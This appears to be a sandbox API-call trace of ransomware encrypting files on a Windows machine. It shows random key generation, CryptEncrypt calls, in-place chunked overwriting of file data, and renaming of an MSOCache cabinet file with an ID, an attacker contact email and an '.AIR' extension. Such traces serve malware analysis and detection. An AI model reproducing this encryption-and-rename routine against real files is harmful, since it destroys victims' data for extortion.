	[0084.434] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.439] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.439] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100000) returned 0x3c20020
	[0084.439] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100000) returned 0x3d30020
	[0084.439] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.439] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.486] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.486] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.486] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.486] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.505] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000
	[0084.505] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.507] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.507] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.507] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.507] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.520] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000
	[0084.521] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.523] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.523] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.523] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.523] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.534] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000
	[0084.534] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.536] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.536] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.536] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.537] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.548] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000
	[0084.548] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.550] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.550] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.550] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.550] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.561] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000
	[0084.561] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.564] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.564] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.564] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x8500000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.564] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.574] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8500000
	[0084.574] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.577] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.577] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.577] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x9800000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.577] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.581] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9800000
	[0084.581] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.583] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.583] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.583] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xab00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.583] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.594] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xab00000
	[0084.594] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.596] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.597] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.597] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xbe00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.597] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.614] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbe00000
	[0084.614] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.616] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xd49ef39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.616] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.616] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3c20020 | out: hHeap=0x540000) returned 1
	[0084.621] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3d30020 | out: hHeap=0x540000) returned 1
	[0084.625] CloseHandle (hObject=0x494) returned 1
	[0084.929] GetProcessHeap () returned 0x540000
	[0084.929] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.929] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0084.929] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0084.929] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc220 | out: hHeap=0x540000) returned 1
	[0084.929] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc178 | out: hHeap=0x540000) returned 1
	[0084.929] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc178
	[0084.929] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0084.929] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0084.929] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.929] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.929] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", dwFileAttributes=0x80) returned 1
	[0084.932] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned 75
	[0084.932] GetProcessHeap () returned 0x540000
	[0084.932] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0084.932] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab"
	[0084.932] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.932] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.935] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x494
	[0084.935] GetProcessHeap () returned 0x540000
	[0084.935] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.935] GetFileSizeEx (in: hFile=0x494, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=177720283) returned 1
	[0084.935] SetFilePointer (in: hFile=0x494, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa97cbdb
	[0084.935] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.935] GetProcessHeap () returned 0x540000
	[0084.935] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.935] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.935] WriteFile (in: hFile=0x494, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.941] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.941] WriteFile (in: hFile=0x494, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.941] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100000) returned 0x3c20020
	[0084.941] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100000) returned 0x3d30020
	[0084.942] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x1300000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.942] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.982] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.982] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.982] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x2600000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.982] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.994] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2600000
	[0084.994] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0084.997] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.997] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.997] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x3900000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0084.997] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.008] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3900000
	[0085.008] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.011] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.011] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0085.011] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x4c00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.011] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.022] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4c00000
	[0085.022] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.025] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.025] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0085.025] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x5f00000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.025] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.040] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5f00000
	[0085.040] WriteFile (in: hFile=0x494, lpBuffer=0x3d30020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3d30020*, lpNumberOfBytesWritten=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.043] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0xa97cce3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.043] WriteFile (in: hFile=0x494, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0085.043] SetFilePointerEx (in: hFile=0x494, liDistanceToMove=0x7200000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1
	[0085.043] ReadFile (in: hFile=0x494, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x100000, lpOverlapped=0x0) returned 1
	[0085.061] SetFilePointer (in: hFile=0x494, lDistanceToMove=-1048576, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7200000
